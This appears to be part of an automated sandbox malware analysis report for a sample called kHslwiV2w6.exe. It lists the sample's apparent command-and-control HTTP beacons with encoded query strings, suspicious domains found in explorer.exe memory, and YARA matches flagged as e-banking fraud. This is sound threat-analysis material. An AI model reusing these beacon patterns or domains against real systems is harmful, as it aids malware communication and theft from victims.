          Source: global traffic HTTP traffic detected: GET /md02/?all=Huvb14uAl+TqSP+sM2oBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyA8WIhVJbwk&P6=6lUxOJCX68zXY HTTP/1.1 Host: www.upcyclecharms.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 198.185.159.144
          Source: Joe Sandbox View IP Address: 52.206.163.162
          Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View ASN Name: SQUARESPACEUS
          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: C:\Windows\explorer.exe; Code function: 4_2_0287DF82 getaddrinfo,setsockopt,recv,4_2_0287DF82
          Source: global traffic; HTTP traffic detected: GET /md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXY HTTP/1.1; Host: www.andrewghita.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /md02/?all=VJE6G0uhaXXjZ9YRdQlMdfAmJtBHOO9P9ftsD0Za8iws3BCdMQRNDr5e7yfdzu876eSq&P6=6lUxOJCX68zXY HTTP/1.1; Host: www.attorney-services-8344642.zone; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /md02/?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXY HTTP/1.1; Host: www.yeslabs.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /md02/?all=ItgQDVkBdIs0QziWKwlLzzQfsI1xbGOZBoDnu4i2Zg+9o67qJyVsSqA76p+pq/A3lGOx&P6=6lUxOJCX68zXY HTTP/1.1; Host: www.vizamag.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic; HTTP traffic detected: GET /md02/?all=PZp0UtAd/MX+bbfmlI0lLX5uB5dB2ubu0xorlIAgjhA6JQ6omJZi4VnySSsC/hEyaNVU&P6=6lUxOJCX68zXY HTTP/1.1; Host: www.tigajco69.fun; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.com/md02/www.tigajco69.fun
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vizamag.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.com/md02/www.coinbureau.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.webuyandsellpa.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyz/md02/www.j3k7n.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.woby.xyzReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyz/md02/www.vizamag.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeslabs.xyzReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.com/md02/www.qqkartel88v1.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.z8ggd.comReferer:
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.top/md02/www.pittsparking.com
          Source: explorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zruypj169g.topReferer:
          Source: explorer.exe, 00000004.00000003.8288746486.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11893982088.000000000D56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
          Source: explorer.exe, 00000004.00000003.8288746486.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6853066858.000000000D56B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11893982088.000000000D56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppf
          Source: explorer.exe, 00000004.00000003.8286773947.00000000093FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000093FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.9476192622.00000000093FE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSP
          Source: explorer.exe, 00000004.00000000.6847520157.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.0000000009440000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8623739115.0000000009440000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000002.11886221151.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8623739115.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.00000000094DB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/U
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/sports/blended?market=en-us&satoriid=3e4b6c3b-d87a-8603-8e90-e93f0f328660&user=m
          Source: explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&oc
          Source: explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000004.00000002.11887310640.0000000009515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8625098549.0000000009510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286773947.00000000094DB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8288291072.00000000094F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8626668270.0000000009514000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pn
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.sv
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.png
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svg
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/W
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/a
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDkX-dark
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-dark
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-dark
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
          Source: explorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA179X84.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1g7bhz.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1lLvot.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1nsFzx.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAUhLdx.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAY97Jf.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAaeOki.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
          Source: explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1d0ujS.img
          Source: explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fef
          Source: explorer.exe, 00000004.00000003.8623027004.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11896448781.0000000010A85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286306641.0000000010A43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6857495261.0000000010A43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000003.8626378435.000000000CFDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CFB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11891782059.000000000CFDB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com0
          Source: kHslwiV2w6.exeString found in binary or memory: https://sectigo.com/CPS0

          E-Banking Fraud

          Source: Yara matchFile source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
